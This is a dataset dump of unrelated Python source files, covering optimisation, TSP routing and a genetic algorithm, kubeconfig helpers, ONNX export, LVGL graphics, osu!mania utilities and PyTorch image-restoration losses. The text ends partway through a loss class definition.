id
stringlengths 3
8
| content
stringlengths 100
981k
|
|---|---|
103860
|
import numpy as np
from pymoo.experimental.deriv import DerivationBasedAlgorithm
from pymoo.algorithms.base.line import LineSearchProblem
from pymoo.algorithms.soo.univariate.exp import ExponentialSearch
from pymoo.algorithms.soo.univariate.golden import GoldenSectionSearch
from pymoo.core.population import Population
from pymoo.util.vectors import max_alpha
class GradientDescent(DerivationBasedAlgorithm):
def direction(self, dF, **kwargs):
return - dF
def step(self):
problem, sol = self.problem, self.opt[0]
self.evaluator.eval(self.problem, sol, evaluate_values_of=["dF"])
dF = sol.get("dF")[0]
print(sol)
if np.linalg.norm(dF) ** 2 < 1e-8:
self.termination.force_termination = True
return
direction = self.direction(dF)
line = LineSearchProblem(self.problem, sol, direction, strict_bounds=self.strict_bounds)
alpha = self.alpha
if self.strict_bounds:
if problem.has_bounds():
line.xu = np.array([max_alpha(sol.X, direction, *problem.bounds(), mode="all_hit_bounds")])
# remember the step length from the last run
alpha = min(alpha, line.xu[0])
if alpha == 0:
self.termination.force_termination = True
return
# make the solution to be the starting point of the univariate search
x0 = sol.copy(deep=True)
x0.set("__X__", x0.get("X"))
x0.set("X", np.zeros(1))
# determine the brackets to be searched in
exp = ExponentialSearch(delta=alpha).setup(line, evaluator=self.evaluator, termination=("n_iter", 20), x0=x0)
a, b = exp.run().pop[-2:]
# search in the brackets
res = GoldenSectionSearch().setup(line, evaluator=self.evaluator, termination=("n_iter", 20), a=a, b=b).run()
infill = res.opt[0]
# set the alpha value and revert the X to be the multi-variate one
infill.set("X", infill.get("__X__"))
self.alpha = infill.get("alpha")[0]
# keep always a few historical solutions
self.pop = Population.merge(self.pop, infill)[-10:]
|
103865
|
import argparse
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../'))
import torch
from volksdep.converters import torch2onnx
from vedaseg.runners import InferenceRunner
from vedaseg.utils import Config
def parse_args():
parser = argparse.ArgumentParser(description='Convert to Onnx model.')
parser.add_argument('config', help='config file path')
parser.add_argument('checkpoint', help='checkpoint file path')
parser.add_argument('out', help='output onnx file name')
parser.add_argument('--dummy_input_shape', default='3,800,1344',
type=str, help='model input shape like 3,800,1344. '
'Shape format is CxHxW')
parser.add_argument('--dynamic_shape', default=False, action='store_true',
help='whether to use dynamic shape')
parser.add_argument('--opset_version', default=9, type=int,
help='onnx opset version')
parser.add_argument('--do_constant_folding', default=False,
action='store_true',
help='whether to apply constant-folding optimization')
parser.add_argument('--verbose', default=False, action='store_true',
help='whether print convert info')
args = parser.parse_args()
return args
def main():
args = parse_args()
cfg = Config.fromfile(args.config)
inference_cfg = cfg['inference']
common_cfg = cfg.get('common')
runner = InferenceRunner(inference_cfg, common_cfg)
assert runner.use_gpu, 'Please use valid gpu to export model.'
runner.load_checkpoint(args.checkpoint)
model = runner.model
shape = map(int, args.dummy_input_shape.split(','))
dummy_input = torch.randn(1, *shape)
if args.dynamic_shape:
print(f'Convert to Onnx with dynamic input shape and '
f'opset version {args.opset_version}')
else:
print(f'Convert to Onnx with constant input shape '
f'{args.dummy_input_shape} and '
f'opset version {args.opset_version}')
torch2onnx(model, dummy_input, args.out, dynamic_shape=args.dynamic_shape,
opset_version=args.opset_version,
do_constant_folding=args.do_constant_folding,
verbose=args.verbose)
print(f'Convert successfully, saved onnx file: {os.path.abspath(args.out)}')
if __name__ == '__main__':
main()
|
103909
|
from __future__ import print_function
from six.moves import xrange
from ortools.constraint_solver import pywrapcp
from ortools.constraint_solver import routing_enums_pb2
import urllib.request
import json
from geopy.distance import vincenty
test_20 = {
"points": [[10.773687, 106.703263], [10.731158, 106.716759], [10.729461, 106.714041], [10.768337, 106.700743], [10.827278, 106.678072], [10.772264, 106.681347], [10.786769, 106.640134], [10.875387, 106.755127], [10.808667, 106.711705], [10.774575, 106.705748], [10.827971, 106.727006], [10.770907, 106.6681], [10.769285, 106.674728], [10.737721, 106.675189], [10.786519, 106.693997], [10.798453, 106.667866], [10.772691, 106.693676], [10.783066, 106.695901], [10.754833, 106.66052], [10.770541, 106.703162]],
"transport_mode": "1N1",
"distance_calculation": "VINCENTY"
}
def return_lambda_gateway_response(code, body):
return {"statusCode": code, "body": json.dumps(body)}
def vincenty_distance(pos_1, pos_2):
pos_1 = (pos_1[0], pos_1[1])
pos_2 = (pos_2[0], pos_2[1])
return vincenty(pos_1, pos_2).meters
def create_distance_matrix(locations, transport_mode, distance_calculation):
# Create the distance matrix.
dist_matrix = {}
# complete distance matrix
# precompute distance between location to have distance callback in O(1)
if distance_calculation == "OSRM":
url = "https://bi.ahamove.com/osrm/table/v1/driving/"
for loc in locations:
url += str(loc[1]) + "," + str(loc[0]) + ";"
url = url[:-1] + "?annotations=distance"
response = urllib.request.urlopen(url).read().decode('UTF-8')
contents = json.loads(response)["distances"]
if transport_mode == "N1":
for index in xrange(len(locations)):
contents[0][index] = 0
if transport_mode == "1N":
for index in xrange(len(locations)):
contents[index][0] = 0
dist_matrix = contents
else:
for from_node in xrange(len(locations)):
dist_matrix[from_node] = {}
for to_node in xrange(len(locations)):
if (from_node == to_node) or (transport_mode == "1N" and to_node == 0) or (transport_mode == "N1" and from_node == 0):
dist_matrix[from_node][to_node] = 0
else:
distance = (vincenty_distance(
locations[from_node],
locations[to_node]))
dist_matrix[from_node][to_node] = distance
return dist_matrix
def create_distance_callback(dist_matrix):
# Create the distance callback.
def distance_callback(from_node, to_node):
return int(dist_matrix[from_node][to_node])
return distance_callback
def tsp(event, context):
# Create the data.
try:
locations = event["points"]
transport_mode = event["transport_mode"]
distance_calculation = event.get("distance_calculation", "VINCENTY")
# Error handling
except KeyError as e:
print("Missing required input: " + str(e))
cluster = {"title": "Missing required input: " + str(e)}
return return_lambda_gateway_response(400, cluster)
if transport_mode != "1N" and transport_mode != "N1" and transport_mode != "1N1":
cluster = {"title": "Invalid transport_mode"}
return return_lambda_gateway_response(400, cluster)
if distance_calculation != "VINCENTY" and distance_calculation != "OSRM":
cluster = {"title": "Invalid distance_calculation"}
return return_lambda_gateway_response(400, cluster)
if distance_calculation == "OSRM" and len(locations) > 100:
cluster = {"title": "Bad request: OSRM cannot be used with more than 100 points"}
return return_lambda_gateway_response(400, cluster)
dist_matrix = create_distance_matrix(locations, transport_mode, distance_calculation)
dist_callback = create_distance_callback(dist_matrix)
tsp_size = len(locations)
num_routes = 1
depot = 0
# Create routing model.
if tsp_size > 0:
routing = pywrapcp.RoutingModel(tsp_size, num_routes, depot)
search_parameters = pywrapcp.RoutingModel.DefaultSearchParameters()
routing.SetArcCostEvaluatorOfAllVehicles(dist_callback)
# Solve the problem.
assignment = routing.SolveWithParameters(search_parameters)
if assignment:
# Solution cost.
print("Total distance: " + str(assignment.ObjectiveValue()) + "\n")
# Inspect solution.
# Only one route here; otherwise iterate from 0 to routing.vehicles() - 1.
route_number = 0
node = routing.Start(route_number)
if transport_mode == "N1":
node = assignment.Value(routing.NextVar(node))
start_node = node
route = ''
cluster = []
while not routing.IsEnd(node):
cluster.append(locations[node])
route += str(node) + ' -> '
node = assignment.Value(routing.NextVar(node))
if transport_mode != "1N":
route += '0'
cluster.append([locations[0]])
print("Route:\n\n" + route)
return return_lambda_gateway_response(200, {"route": cluster})
else:
print('No solution found.')
else:
print('Specify an instance greater than 0.')
def main():
event = test_20
print(tsp(event, ""))
if __name__ == '__main__':
main()
|
103918
|
import os
import torch
import numbers
import torchvision.transforms as transforms
import torchvision.transforms.functional as F
from torch.utils.data import Subset, TensorDataset
import numpy as np
def get_dataset(args, config):
if config.data.random_flip is False:
tran_transform = test_transform = transforms.Compose(
[transforms.Resize(config.data.image_size), transforms.ToTensor()]
)
else:
tran_transform = transforms.Compose(
[
transforms.Resize(config.data.image_size),
transforms.RandomHorizontalFlip(p=0.5),
transforms.ToTensor(),
]
)
test_transform = transforms.Compose(
[transforms.Resize(config.data.image_size), transforms.ToTensor()]
)
train_samples = np.load(args.train_fname)
train_labels = np.zeros(len(train_samples))
data_mean = np.mean(train_samples, axis=(0, 2, 3), keepdims=True)
data_std = np.std(train_samples, axis=(0, 2, 3), keepdims=True)
train_samples = (train_samples - data_mean)/data_std
print("train data shape are - ", train_samples.shape, train_labels.shape)
print("train data stats are - ", np.mean(train_samples), np.std(train_samples),
np.min(train_samples), np.max(train_samples))
dataset = torch.utils.data.TensorDataset(
torch.from_numpy(train_samples).float(), torch.from_numpy(train_labels).float())
return dataset
def logit_transform(image, lam=1e-6):
image = lam + (1 - 2 * lam) * image
return torch.log(image) - torch.log1p(-image)
def data_transform(config, X):
if config.data.uniform_dequantization:
X = X / 256.0 * 255.0 + torch.rand_like(X) / 256.0
if config.data.gaussian_dequantization:
X = X + torch.randn_like(X) * 0.01
if config.data.rescaled:
X = 2 * X - 1.0
elif config.data.logit_transform:
X = logit_transform(X)
if hasattr(config, "image_mean"):
return X - config.image_mean.to(X.device)[None, ...]
return X
def inverse_data_transform(config, X):
if hasattr(config, "image_mean"):
X = X + config.image_mean.to(X.device)[None, ...]
if config.data.logit_transform:
X = torch.sigmoid(X)
elif config.data.rescaled:
X = (X + 1.0) / 2.0
return torch.clamp(X, 0.0, 1.0)
|
103920
|
import networkzero as nw0
address = nw0.advertise("myservice3", 1234)
print("Service is at address", address)
|
103928
|
import os
import shutil
from vilya.libs.permdir import get_repo_root
from vilya.models.project import CodeDoubanProject
from tests.base import TestCase
class TestBasic(TestCase):
def test_create_git_repo(self):
git_path = os.path.join(get_repo_root(), 'abc.git')
CodeDoubanProject.create_git_repo(git_path)
assert os.path.exists(git_path)
info_file = os.path.join(git_path, 'refs')
assert os.path.exists(info_file)
shutil.rmtree(git_path)
|
103944
|
import random, sys, gzip
class tour:
def __init__(self):
self.path = [None] * 1
self.fit = 0
self.travel = 0
def mutate(self):
a = random.randint(0, len(self.path)-1)
b = random.randint(0, len(self.path)-1)
temp = self.path[a]
self.path[a] = self.path[b]
self.path[b] = temp
def blanktour(self, size):
self.path = [None] * size
return self.paths
def newtour(self,tovisit):
self.path = tovisit[:]
random.shuffle(self.path)
return self.path
def setpath(self,update):
self.path = update
def tourlen(self):
return len(self.path)
def visits(self,city):
return (city in self.path)
def get(self,idx):
return self.path[idx]
def setspot(self, put, spot):
self.path[spot] = put
self.fit = 0
self.travel = 0
def getfit(self):
if (self.fit == 0):
self.fit = 1.0/self.getdist()
return self.fit
def getdist(self):
if (self.travel == 0):
self.calc()
return self.travel
def calc(self):
tot = 0
for i in range(len(self.path)-1):
tot += self.path[i].distanceTo(self.path[i+1].index)
self.travel = tot
return tot
def tostr(self):
build = ""
build = str ( map(maphelper3, self.path))
return build
class vertex:
def __init__(self, idx):
self.name = "Austin"
self.edges = {}
self.index = idx
self.pos = (0,0)
def setpos(self, x, y):
self.pos = (x,y)
def setIndex(self, idxin):
self.index = idxin
def setName(self,namein):
self.name = namein
def addEdge(self, v, edge_weight):
self.edges[v.getIdx()] = edge_weight
# if symmetric
v.edges[self.index] = edge_weight
def distanceTo(self, otheridx):
return self.edges[otheridx]
def getIdx(self):
return self.index
def maphelper(t):
return t.getfit()
def maphelper2(t):
return t.tostr()
def maphelper3(v):
return int(v.name)
class pop:
def __init__(self, initpopsize, initflag, cities):
self.tours = [None] * initpopsize
self.size = initpopsize
self.popset = False
if (initflag):
for i in range(len(self.tours)):
t = tour()
debug = t.newtour(cities)
self.tours[i] = t
def get(self,index):
return self.tours[index]
def settour(self,index, tourtoset):
self.tours[index] = tourtoset
def popsize():
return self.size
def calc(self):
self.popcorn = map( maphelper , self.tours)
self.popset = True
return self.popcorn
def tostr(self):
if (self.popset):
return zip(map(maphelper2, self.tours), self.popcorn)
else:
return map(maphelper2, self.tours)
def max_fit(self): # returns tuple of tour, fitness val
if (not self.popset):
self.calc()
self.popset = True
val = max(self.popcorn)
return (self.tours[self.popcorn.index(val)], val)
def getparent(self, subpopsize, cities):
if ( self.popset):
temp = random.randint(0, len(self.popcorn) - subpopsize)
subpop = self.popcorn[temp:temp+subpopsize]
return self.tours[ subpop.index(max(subpop)) + temp]
else:
temp = random.randint(0, len(self.tours) - subpopsize)
subpop = pop(subpopsize, False, cities)
subpop.tours = self.tours[temp:temp+subpopsize]
subpop.calc()
return subpop.max_fit()[0]
class gen:
def __init__(self, mutationrate, gensize, tournamentsize, elitismflag, cities):
self.rate = mutationrate
self.poolsize = gensize
self.tsize = tournamentsize
self.eflag = elitismflag
self.saved = cities
self.pool = pop(gensize, True, cities)
def evolve(self):
nextpool = pop(self.poolsize, False, self.saved)
start = 0
if (self.eflag):
elite = self.pool.max_fit()
nextpool.settour(0, elite[0])
start += 1
# Crossover step
for i in range(start, self.poolsize):
tourA = self.pool.getparent(self.tsize, self.saved)
tourB = self.pool.getparent(self.tsize, self.saved)
nextpool.settour(i, self.cross(tourA,tourB))
# Mutation step
for m in nextpool.tours:
if random.random() < self.rate:
m.mutate()
self.pool = nextpool
def cross(self,tourA, tourB):
apath = tourA.path
bpath = tourB.path
s = random.randint(0, len(apath))
e = random.randint(s, len(apath))
subb = [elem for elem in bpath if not(elem in apath[s:e])]
child = subb[:s] + apath[s:e] + subb[s:]
childtour = tour()
childtour.setpath(child)
return childtour
def distance(posa, posb):
return ( (posb[1] - posa[1]) ** 2 + (posb[0] - posa[0]) ** 2 ) ** 0.5
def main():
path = sys.argv[1]
# with gzip.open(path,'rb') as f:
# file = f.readlines()
file = open(path, 'r')
counter = 0
curr_cities = []
for line in file:
if ord(line[0]) >= 58 or ord(line[0]) <= 47 :
continue
temp = line.strip().split()
city = vertex(counter)
city.setName(temp[0])
city.setpos(float(temp[1]), float(temp[2]))
for i in range(counter-1, -1, -1):
city.addEdge( curr_cities[i] ,distance( city.pos, curr_cities[i].pos))
curr_cities.append(city)
counter += 1
r = int(sys.argv[2])
p = int(sys.argv[3])
# mutation rate, popsize, tourneysize, eliteflag, cities
mr = float(sys.argv[4])
ps = int(sys.argv[5])
ts = int(sys.argv[6])
ga = gen(mr, ps, ts, True, curr_cities)
for i in range(r):
ga.evolve()
if i % p == 0:
print "Best route at Generation", i
macks = ga.pool.max_fit()
print macks[0].tostr(),macks[1], macks[0].getdist()
print "Best route at end"
macks = ga.pool.max_fit()
print macks[0].tostr(), macks[0].getdist()
# perfect = [1, 49, 32, 45, 19, 41, 8, 9, 10, 43, 33, 51, 11, 52, 14, 13, 47, 26, 27, 28, 12, 25, 4, 6, 15, 5, 24, 48 ,38, 37, 40, 39, 36, 35, 34, 44, 46, 16, 29, 50, 20, 23, 30, 2, 7, 42, 21, 17, 3, 18, 31, 22]
# perf = tour()
# perfpath= []
# for i in perfect:
# perfpath.append(curr_cities[i-1])
# perf.setpath(perfpath)
# print perf.getdist()
# it was like just under 8000 for berlin test
main()
|
103961
|
from __future__ import absolute_import
import openshift as oc
import base64
import json
def get_kubeconfig():
"""
:return: Returns the current kubeconfig as a python dict
"""
return json.loads(oc.invoke('config',
cmd_args=['view',
'-o=json',
'--raw',
],
no_namespace=True).out().strip())
def _get_kubeconfig_model(_kc_model=None):
if _kc_model:
return _kc_model
else:
return oc.Model(dict_to_model=get_kubeconfig())
def get_kubeconfig_cluster_names(_kc_model=None):
"""
:param _kc_model: Internally used to cache kubeconfig info.
:return: Returns a list of all the cluster names in the kubeconfig.
"""
kc = _get_kubeconfig_model(_kc_model=_kc_model)
names = []
for cluster_entry in kc.clusters:
names.append(cluster_entry.name)
return names
def get_kubeconfig_current_context_name(_kc_model=None):
"""
:param _kc_model: Internally used to cache kubeconfig info.
:return: Returns the name of the current context in your kubeconfig
"""
kc = _get_kubeconfig_model(_kc_model=_kc_model)
return kc['current-context']
def get_kubeconfig_context(context_name=None, _kc_model=None):
"""
:param _kc_model: Internally used to cache kubeconfig info.
:param context_name: The context to retrieve or None to retrieve the current context.
:return: Returns a dict of the specified context or current context. e.g. {cluster:..., namespace:...., user:....}
"""
kc = _get_kubeconfig_model(_kc_model=_kc_model)
if context_name is None:
context_name = get_kubeconfig_current_context_name(_kc_model=kc)
for context_entry in kc.contexts:
if context_entry.name == context_name:
return context_entry.context._primitive()
return None
def get_kubeconfig_current_cluster_name(_kc_model=None):
"""
:param _kc_model: Internally used to cache kubeconfig info.
:return: Returns the cluster associated with the current context.
"""
kc = _get_kubeconfig_model(_kc_model=_kc_model)
current_context_name = get_kubeconfig_current_context_name(_kc_model=kc)
return get_kubeconfig_context(context_name=current_context_name, _kc_model=kc)['cluster']
def get_kubeconfig_cluster(cluster_name=None, _kc_model=None):
"""
:param cluster_name: The context to retrieve or None for current context dict
:param _kc_model: Internally used to cache kubeconfig info.
:return: Returns a raw bytes from kubeconfig in a dict of the specified cluster or current cluster.
e.g. {server:.. certificate-authority-data:.}. Note that since the bytes are raw, an entry like
certificate-data-authority would need to be decoded to get PEM content.
"""
kc = _get_kubeconfig_model(_kc_model=_kc_model)
if cluster_name is None:
cluster_name = get_kubeconfig_current_cluster_name(_kc_model=kc)
for cluster_entry in kc.clusters:
if cluster_entry.name == cluster_name:
return cluster_entry.cluster._primitive()
return None
def set_kubeconfig_insecure_skip_tls_verify(active, cluster_name=None, _kc_model=None):
"""
Sets or removes insecure-skip-tls-verify for the specified cluster (or the current cluster if
not specified).
:param active: If True, enable insecure-skip-tls-verify for the the cluster
:param cluster_name: The cluster name to modify. If not specified, the current context's cluster will be modified.
:param _kc_model: Internally used to cache kubeconfig info.
"""
if not cluster_name:
cluster_name = get_kubeconfig_current_cluster_name(_kc_model=_kc_model)
oc.invoke('config',
cmd_args=['set-cluster',
cluster_name,
'--insecure-skip-tls-verify={}'.format(str(active).lower()),
],
no_namespace=True)
def remove_kubeconfig_certifcate_authority(cluster_name=None, _kc_model=None):
"""
When you installer a valid certificate for your api endpoint, you may want to
use your host's local certificate authorities. To do that, references to certificate
authorities must be removed from your kubeconfig.
:param cluster_name: The cluster name to modify. If not specified, the current context's cluster will be modified.
:param _kc_model: Internally used to cache kubeconfig info.
"""
if not cluster_name:
cluster_name = get_kubeconfig_current_cluster_name(_kc_model=_kc_model)
# Setting insecure will remove any other certificate-authority data from the cluster's entry
set_kubeconfig_insecure_skip_tls_verify(True, cluster_name=cluster_name, _kc_model=_kc_model)
# Now set it back to false, removing the insecure-skip-tls-verify entry from kubeconfig
set_kubeconfig_insecure_skip_tls_verify(False, cluster_name=cluster_name, _kc_model=_kc_model)
def get_kubeconfig_certificate_authority_data(cluster_name=None, _kc_model=None):
"""
Returns the certificate authority data (if any) for the specified cluster.
:param cluster_name: The cluster name to inspect. If not specified, the ca data will be
returned for the current context's cluster.
:param _kc_model: Internally used to cache kubeconfig info.
:return: The PEM encoded x509 data or None if the cluster did not posses a certificate-authority-data
field.
"""
kc = _get_kubeconfig_model(_kc_model=_kc_model)
if not cluster_name:
cluster_name = get_kubeconfig_current_cluster_name(_kc_model=kc)
cluster_dict = get_kubeconfig_cluster(cluster_name, _kc_model=kc)
data = cluster_dict.get('certificate-authority-data', None)
if data:
# the data is base64 encoded PEM, so decode it.
return base64.b64decode(data)
return None
def set_kubeconfig_certificate_authority_data(ca_data, cluster_name=None, _kc_model=None):
"""
Sets the certificate authority data for one or more clusters in the kubeconfig.
:param ca_data: The certificate authority data (PEM format). The chain will be encoded into
base64 before being set in the kubeconfig.
:param cluster_name: The cluster name to affect. If not specified, the ca data will be
set for the current context.
:param _kc_model: Internally used to cache kubeconfig info.
:return: n/a
"""
kc = _get_kubeconfig_model(_kc_model=_kc_model)
if not cluster_name:
cluster_name = get_kubeconfig_current_cluster_name(_kc_model=kc)
# The kubeconfig cluster entry may have an existing certificate-authority file or have
# insecure-skip-tls-verify set to true. Have ca-data set alongside either of these is
# an invalid state for the kubeconfig, so we use a trick: setting insecure-skip-tls-verify
# will clear existing certificate authority entries. When we set it back to true, we can
# safely poke in the ca-data
remove_kubeconfig_certifcate_authority(cluster_name=cluster_name, _kc_model=kc)
b64_data = base64.b64encode(ca_data)
# Now we can poke in the value that we need
oc.invoke('config',
# https://github.com/kubernetes/kubectl/issues/501#issuecomment-406890261
cmd_args=['set',
'clusters.{}.certificate-authority-data'.format(cluster_name),
b64_data
],
no_namespace=True)
|
104015
|
try:
with open('../../../assets/img_cogwheel_argb.bin','rb') as f:
cogwheel_img_data = f.read()
except:
try:
with open('images/img_cogwheel_rgb565.bin','rb') as f:
cogwheel_img_data = f.read()
except:
print("Could not find binary img_cogwheel file")
# create the cogwheel image data
cogwheel_img_dsc = lv.img_dsc_t(
{
"header": {"always_zero": 0, "w": 100, "h": 100, "cf": lv.img.CF.TRUE_COLOR_ALPHA},
"data": cogwheel_img_data,
"data_size": len(cogwheel_img_data),
}
)
# Create an image using the decoder
img1 = lv.img(lv.scr_act(),None)
lv.img.cache_set_size(2)
img1.align(lv.scr_act(), lv.ALIGN.CENTER, 0, -50)
img1.set_src(cogwheel_img_dsc)
img2 = lv.img(lv.scr_act(), None)
img2.set_src(lv.SYMBOL.OK+"Accept")
img2.align(img1, lv.ALIGN.OUT_BOTTOM_MID, 0, 20)
|
104081
|
import math
from misc.callback import callback
# Drawing parameters
class ManiaSettings():
viewable_time_interval = 1000 # ms
note_width = 50 # osu!px
note_height = 15 # osu!px
note_seperation = 5 # osu!px
replay_opacity = 50 # %
@staticmethod
@callback
def set_viewable_time_interval(viewable_time_interval):
ManiaSettings.viewable_time_interval = viewable_time_interval
ManiaSettings.set_viewable_time_interval.emit()
@staticmethod
@callback
def set_note_width(note_width):
ManiaSettings.note_width = note_width
ManiaSettings.set_note_width.emit()
@staticmethod
@callback
def set_note_height(note_height):
ManiaSettings.note_height = note_height
ManiaSettings.set_note_height.emit()
@staticmethod
@callback
def set_note_seperation(note_seperation):
ManiaSettings.note_seperation = note_seperation
ManiaSettings.set_note_seperation.emit()
@staticmethod
@callback
def set_replay_opacity(replay_opacity):
ManiaSettings.replay_opacity = replay_opacity
ManiaSettings.set_replay_opacity.emit()
@staticmethod
def get_spatial_data(space_width, space_height, num_columns, time):
ratio_x = space_width/Mania.PLAYFIELD_WIDTH # px per osu!px
ratio_y = space_height/Mania.PLAYFIELD_HEIGHT # px per osu!px
ratio_t = space_height/ManiaSettings.viewable_time_interval # px per ms
total_width = num_columns*(ManiaSettings.note_width + ManiaSettings.note_seperation)*ratio_x
start_time = time
end_time = time + ManiaSettings.viewable_time_interval
x_offset = space_width/2.0 - total_width/2.0
y_offset = space_height
return start_time, end_time, ratio_x, ratio_y, ratio_t, x_offset, y_offset
class Mania():
PLAYFIELD_WIDTH = 512 # osu!px
PLAYFIELD_HEIGHT = 384 # osu!px
@staticmethod
def is_hitobject_type(hitobject_type, compare):
return hitobject_type & compare > 0
@staticmethod
def get_time_range(hitobjects, column=None):
if column != None:
try: return (hitobjects[column][0].time, hitobjects[column][-1].end_time)
except: return (hitobjects[column][0].time, hitobjects[column][-1].time)
all_time_range = [ math.inf, -math.inf ]
for column in range(len(hitobjects)):
column_time_range = Mania.get_time_range(hitobjects, column)
all_time_range[0] = min(all_time_range[0], column_time_range[0])
all_time_range[1] = max(all_time_range[1], column_time_range[1])
print(all_time_range)
return (all_time_range[0], all_time_range[1])
@staticmethod
def get_acc_from_hits(num_300_hits, num_200_hits, num_100_hits, num_50_hits, num_misses):
score_hits = 50*num_50_hits + 100*num_100_hits + 200*num_200_hits + 300*num_300_hits
score_total = 300*(num_misses + num_50_hits + num_100_hits + num_200_hits + num_300_hits)
return score_hits/score_total
# Returns the key column based on the xpos of the note and the number of keys there are
@staticmethod
def get_column(x_pos, columns):
ratio = columns / Mania.PLAYFIELD_WIDTH # columns per osu!px
return min(math.floor(ratio*x_pos), columns - 1)
@staticmethod
def get_key_presses(key_val):
# Generator yielding value of each bit in an integer if it's set + value
# of LSB no matter what .
def bits(n):
if n == 0: yield 0
while n:
b = n & (~n+1)
yield b
n ^= b
def keys(bit_list):
for bit in bit_list:
if bit == 0: continue
yield math.log2(bit)
return keys(bits(int(key_val)))
|
104100
|
import sys
import os
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from utils.modules.vggNet import VGGFeatureExtractor
class TVLoss(nn.Module):
def __init__(self, weight=1.0):
super(TVLoss, self).__init__()
self.weight = weight
self.l1 = nn.L1Loss(reduction='mean')
def forward(self, out, gt):
grad_out_x = out[:, :, :, 1:] - out[:, :, :, :-1]
grad_out_y = out[:, :, 1:, :] - out[:, :, :-1, :]
grad_gt_x = gt[:, :, :, 1:] - gt[:, :, :, :-1]
grad_gt_y = gt[:, :, 1:, :] - gt[:, :, :-1, :]
loss_x = self.l1(grad_out_x, grad_gt_x)
loss_y = self.l1(grad_out_y, grad_gt_y)
loss = self.weight * (loss_x + loss_y)
return loss
class CharbonnierLoss(nn.Module):
"""Charbonnier Loss (L1)"""
def __init__(self, eps=1e-6, mode=None):
super(CharbonnierLoss, self).__init__()
self.eps = eps
self.mode = mode
def forward(self, x, y, mask=None):
N = x.size(1)
diff = x - y
loss = torch.sqrt(diff * diff + self.eps)
if mask is not None:
loss = loss * mask
if self.mode == 'sum':
loss = torch.sum(loss) / N
else:
loss = loss.mean()
return loss
class BBL(nn.Module):
def __init__(self, alpha=1.0, beta=1.0, ksize=3, pad=0, stride=3, dist_norm='l2', criterion='l1'):
super(BBL, self).__init__()
self.alpha = alpha
self.beta = beta
self.ksize = ksize
self.pad = pad
self.stride = stride
self.dist_norm = dist_norm
if criterion == 'l1':
self.criterion = torch.nn.L1Loss(reduction='mean')
elif criterion == 'l2':
self.criterion = torch.nn.L2loss(reduction='mean')
else:
raise NotImplementedError('%s criterion has not been supported.' % criterion)
def pairwise_distance(self, x, y=None):
'''
Input: x is a Nxd matrix
y is an optional Mxd matirx
Output: dist is a BxNxM matrix where dist[i,j] is the square norm between x[i,:] and y[j,:]
if y is not given then use 'y=x'.
i.e. dist[i,j] = ||x[i,:]-y[j,:]||^2
'''
x_norm = (x ** 2).sum(1).view(-1, 1)
if y is not None:
y_t = torch.transpose(y, 0, 1)
y_norm = (y ** 2).sum(1).view(1, -1)
else:
y_t = torch.transpose(x, 0, 1)
y_norm = x_norm.view(1, -1)
dist = x_norm + y_norm - 2.0 * torch.mm(x, y_t)
# Ensure diagonal is zero if x=y
if y is None:
dist = dist - torch.diag(dist.diag())
return torch.clamp(dist, 0.0, np.inf)
def batch_pairwise_distance(self, x, y=None):
'''
Input: x is a BxNxd matrix
y is an optional BxMxd matirx
Output: dist is a BxNxM matrix where dist[b,i,j] is the square norm between x[b,i,:] and y[b,j,:]
if y is not given then use 'y=x'.
i.e. dist[b,i,j] = ||x[b,i,:]-y[b,j,:]||^2
'''
B, N, d = x.size()
if self.dist_norm == 'l1':
x_norm = x.view(B, N, 1, d)
if y is not None:
y_norm = y.view(B, 1, -1, d)
else:
y_norm = x.view(B, 1, -1, d)
dist = torch.abs(x_norm - y_norm).sum(dim=3)
elif self.dist_norm == 'l2':
x_norm = (x ** 2).sum(dim=2).view(B, N, 1)
if y is not None:
M = y.size(1)
y_t = torch.transpose(y, 1, 2)
y_norm = (y ** 2).sum(dim=2).view(B, 1, M)
else:
y_t = torch.transpose(x, 1, 2)
y_norm = x_norm.view(B, 1, N)
dist = x_norm + y_norm - 2.0 * torch.bmm(x, y_t)
# Ensure diagonal is zero if x=y
if y is None:
dist = dist - torch.diag_embed(torch.diagonal(dist, dim1=-2, dim2=-1), dim1=-2, dim2=-1)
dist = torch.clamp(dist, 0.0, np.inf)
# dist = torch.sqrt(torch.clamp(dist, 0.0, np.inf) / d)
else:
raise NotImplementedError('%s norm has not been supported.' % self.dist_norm)
return dist
def forward(self, x, gt):
p1 = F.unfold(x, kernel_size=self.ksize, padding=self.pad, stride=self.stride)
B, C, H = p1.size()
p1 = p1.permute(0, 2, 1).contiguous() # [B, H, C]
p2 = F.unfold(gt, kernel_size=self.ksize, padding=self.pad, stride=self.stride)
p2 = p2.permute(0, 2, 1).contiguous() # [B, H, C]
gt_2 = F.interpolate(gt, scale_factor=0.5, mode='bicubic', align_corners = False)
p2_2 = F.unfold(gt_2, kernel_size=self.ksize, padding=self.pad, stride=self.stride)
p2_2 = p2_2.permute(0, 2, 1).contiguous() # [B, H, C]
gt_4 = F.interpolate(gt, scale_factor=0.25, mode='bicubic',align_corners = False)
p2_4 = F.unfold(gt_4, kernel_size=self.ksize, padding=self.pad, stride=self.stride)
p2_4 = p2_4.permute(0, 2, 1).contiguous() # [B, H, C]
p2_cat = torch.cat([p2, p2_2, p2_4], 1)
score1 = self.alpha * self.batch_pairwise_distance(p1, p2_cat)
score = score1 + self.beta * self.batch_pairwise_distance(p2, p2_cat) # [B, H, H]
weight, ind = torch.min(score, dim=2) # [B, H]
index = ind.unsqueeze(-1).expand([-1, -1, C]) # [B, H, C]
sel_p2 = torch.gather(p2_cat, dim=1, index=index) # [B, H, C]
loss = self.criterion(p1, sel_p2)
return loss
class PerceptualLoss(nn.Module):
"""Perceptual loss with commonly used style loss.
Args:
layer_weights (dict): The weight for each layer of vgg feature.
Here is an example: {'conv5_4': 1.}, which means the conv5_4
feature layer (before relu5_4) will be extracted with weight
1.0 in calculting losses.
vgg_type (str): The type of vgg network used as feature extractor.
Default: 'vgg19'.
use_input_norm (bool): If True, normalize the input image in vgg.
Default: True.
perceptual_weight (float): If `perceptual_weight > 0`, the perceptual
loss will be calculated and the loss will multiplied by the
weight. Default: 1.0.
style_weight (float): If `style_weight > 0`, the style loss will be
calculated and the loss will multiplied by the weight.
Default: 0.
norm_img (bool): If True, the image will be normed to [0, 1]. Note that
this is different from the `use_input_norm` which norm the input in
in forward function of vgg according to the statistics of dataset.
Importantly, the input image must be in range [-1, 1].
Default: False.
criterion (str): Criterion used for perceptual loss. Default: 'l1'.
"""
def __init__(self,
layer_weights,
vgg_type='vgg19',
use_input_norm=True,
use_pcp_loss=True,
use_style_loss=True,
norm_img=False,
criterion='l1'):
